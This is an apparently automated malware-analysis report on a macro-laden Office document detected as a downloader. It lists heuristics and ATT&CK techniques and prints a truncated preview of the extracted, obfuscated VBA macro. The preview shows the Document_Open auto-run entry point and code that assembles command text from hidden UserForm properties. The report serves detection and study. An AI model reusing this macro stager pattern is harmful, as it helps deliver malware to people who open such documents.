MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro that is automatically executed upon opening, as indicated by the Document_Open macro and CreateObject heuristics. The macro appears to be a command stager, likely designed to download and execute a secondary payload. The ClamAV detection of 'Doc.Downloader.Sagent-7454029-0' further supports its downloader functionality.
Heuristics (7)
- ClamAV: Doc.Downloader.Sagent-7454029-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-7454029-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10966 bytes | 8b140e455a34f8aa92109811060058b938672f863f8a9ca7d458fa6e659b1eb2 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Wvmalqaed"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xafmjubswzkvh, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Lhzuefqeoualy = Jjtcjzakdxoxc
Datpclovfiq = Qgcluecuhva
Xwxqhnvbqa = Eounnutomt
Select _
Case Ddxgtvesrsns
Case 972
Adqmzglbqqh _
= Hex _
(814)
Bhjxdzdmepoi = CVar(207)
Yrmacqytpxau _
= Hex(699)
Case 872
Bnhymbdliu = CVar(368)
Ucwnbefkmkdq _
= 488
Vhrlxjiulri = CDate _
(108)
Case 538
Ssnjrqjvwxcw = _
CInt(932)
Gwrjqtvgvtw = Log(Kaqefmim)
Alavvzkppcucx = Rvzmwunvp
End Select
Ngpafhkxkn = Vfbdtvztvff
Xprjuzujjgvrg = Buantyxyqiux
Nibtdhstnpnre = Fmnzgraescxzq
Select _
Case Ackkwyuy
Case 640
Aigkzcumzkv _
= Hex _
(769)
Dhndiqfhbrmpl = CVar(46)
Palokkgjuuta _
= Hex(627)
Case 729
Rrftegcjumh = CVar(633)
Yquuouzwy _
= 751
Wnxysjpqc = CDate _
(161)
Case 460
Agwgasgfyg = _
CInt(46)
Itzzffer = Log(Xwrjeqlxqumo)
Yhugpsaajjp = Jjkydrjjzpro
End Select
Fhlatmzc = Hruzpaapt
Exmdazpkort = Xufldbzw
Tpbiqnswrjm = Ywtnjsloop
Select _
Case Vuomsxto
Case 274
Oyrzwwubsrwk _
= Hex _
(529)
Koqeezezlfu = CVar(765)
Kzlslafh _
= Hex(216)
Case 197
Kvotmxzglnybe = CVar(927)
Kjopnledskc _
= 403
Kkbiprfiqgscl = CDate _
(830)
Case 298
Gfivecbqqs = _
CInt(292)
Fsvjkrzwal = Log(Mbhudwmbmv)
Bgcwitlpiha = Wikldiupwjcv
End Select
Mybqpirouq
End Sub
Attribute VB_Name = "Kopbukxsd"
Attribute VB_Base = "0{B641B2EB-DC93-416B-BEA6-8182BA37ABEF}{EC934842-EAC4-4E0F-ABBD-E9134B1B0760}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Yjnrqrtuutmgd"
Function Jxohkkahqtvg()
Tlikltzxt = Gourbdmzhh
Kxuipgvqwxhvm = Qmpdrdxkkbtvi
Yzolynrkjr = Pigyfrevm
Select _
Case Nwnmjhvk
Case 806
Mzhhallzcf _
= Hex _
(98)
Vhbdcoedixgw = CVar(352)
Kahcoglwdjy _
= Hex(160)
Case 21
Ftvjlqtbf = CVar(845)
Eggkdoslf _
= 826
Lsarghye = CDate _
(469)
Case 173
Ljzkmnvfh = _
CInt(871)
Pbxhzbtor = Log(Uehdjujmca)
Txhzqaxf = Wvqcjggfqarzo
End Select
Zxwqjvefztk = Wvmalqaed.Xafmjubswzkvh
Hszgkzgq = Xvyozibhmikb
Ezpedqvnrrdhg = Rqiytsrxul
Nuepfqbbkkcmw = Dhkrbdwvrc
Select _
Case Encvsxris
Case 868
Xqfvzgov _
= Hex _
(594)
Ioqjufuqzmmc = CVar(837)
Oipjpfrrpfmaw _
= Hex(557)
Case 339
Ocgbnwzllxrwr = CVar(569)
Ovhhgqre _
= 922
Crykwujmtkkgb = CDate _
(89)
Case 527
Pwdlxizx = _
CInt(903)
Rsobfxxaeke = Log(Odikxjqi)
Grtotiocuk = Culnnmfxk
End Select
Qaaydpknm = Zxwqjvefztk + Kopbukxsd.Oudrjneamo + Kopbukxsd.Liivbpuc + Kopbukxsd.Ubrfolzplf
Btripuhispsn = Qiwiwteeaa
Vpkfzgeosehyo = Sklfuwkxhcp
Pxsrxpyrynp = Gumbxuofmt
Select _
Case Pclsdckaoyvl
Case 998
Ykwtxvtl _
= Hex _
(906)
Lffurkdddwi = CVar(187)
Zvkeluhzblw _
= Hex(442)
Case 57
Jswtbdmv = CVar(840)
Xqjevrhtslwwy _
= 822
Hrjrjujzmak = CDate _
(773)
C
... (truncated)